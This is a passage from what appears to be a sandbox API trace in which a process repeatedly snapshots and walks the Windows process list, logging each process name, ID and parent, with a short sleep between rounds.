th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0126.789] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0126.791] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.792] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0126.793] CloseHandle (hObject=0xc4) returned 1 [0126.793] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0126.799] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0126.800] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0126.801] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0126.802] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, 
dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0126.865] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0126.866] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0126.867] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0126.868] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0126.869] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0126.869] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0126.870] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0126.871] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.872] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.873] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.874] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.874] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0126.875] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.876] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0126.877] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0126.878] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.880] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0126.881] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0126.883] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0126.884] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0126.886] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="svchost.exe")) returned 1 [0126.887] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0126.889] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0126.890] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0126.892] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0126.893] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0126.895] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0126.897] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0126.898] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0126.961] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0126.962] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0126.964] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0126.965] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0126.966] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0126.968] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0126.969] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0126.971] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0126.972] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0126.973] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0126.975] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0126.976] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0126.977] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0126.979] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0126.980] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0126.981] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0126.983] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0126.984] CloseHandle (hObject=0xbc) returned 1 [0126.984] Sleep (dwMilliseconds=0x12c) [0127.293] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0127.299] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0127.300] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="System")) returned 1 [0127.300] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0127.301] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0127.302] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0127.303] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0127.304] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0127.305] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0127.306] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="lsass.exe")) returned 1 [0127.306] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0127.307] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.308] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.309] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.310] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.311] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.312] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="audiodg.exe")) returned 1 [0127.313] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.313] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.314] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0127.315] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.316] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0127.317] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0127.319] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="dwm.exe")) returned 1 [0127.320] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0127.321] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.322] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0127.323] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0127.325] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0127.326] Process32NextW (in: hSnapshot=0xc4, 